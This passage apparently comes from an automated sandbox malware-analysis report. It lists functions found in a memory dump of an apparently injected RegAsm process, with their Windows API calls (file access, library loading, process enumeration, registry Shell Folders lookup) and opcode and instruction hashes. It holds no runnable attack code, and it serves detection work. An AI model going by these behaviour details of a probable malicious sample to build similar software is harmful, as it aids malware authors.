                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset
                                                          • String ID:
                                                          • API String ID: 2221118986-0
                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                            • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                          • String ID:
                                                          • API String ID: 1481295809-0
                                                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3150196962-0
                                                          • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                          • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$PointerRead
                                                          • String ID:
                                                          • API String ID: 3154509469-0
                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                          Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                          • String ID:
                                                          • API String ID: 4232544981-0
                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                          Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                          Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$FileModuleName
                                                          • String ID:
                                                          • API String ID: 3859505661-0
                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                          Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                          Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                          Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                          Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                          Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                          Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                          Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                          Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                          Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                          Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: EnumNamesResource
                                                          • String ID:
                                                          • API String ID: 3334572018-0
                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                          Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                          Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CloseFind
                                                          • String ID:
                                                          • API String ID: 1863332320-0
                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                          Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Open
                                                          • String ID:
                                                          • API String ID: 71445658-0
                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                          Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                          Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@
                                                          • String ID:
                                                          • API String ID: 613200358-0
                                                          • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                          • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                          Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                          Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004095FC
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                          • String ID:
                                                          • API String ID: 3655998216-0
                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                          Function 00415B2C Relevance: 1.3, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                          • Instruction ID: 56811e6a31311fae19106e74f332fd481794b0d175407c03959d21f12539f693
                                                          • Opcode Fuzzy Hash: c75aee8a2a8dfae17061e24b09256e9f24568c4c4acdadc464b978748c80593b
                                                          • Instruction Fuzzy Hash: 4201E572109E01E6DB1029278C81AF766899FC0399F14016FF94886281EEA8EEC542AE
                                                          Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00445426
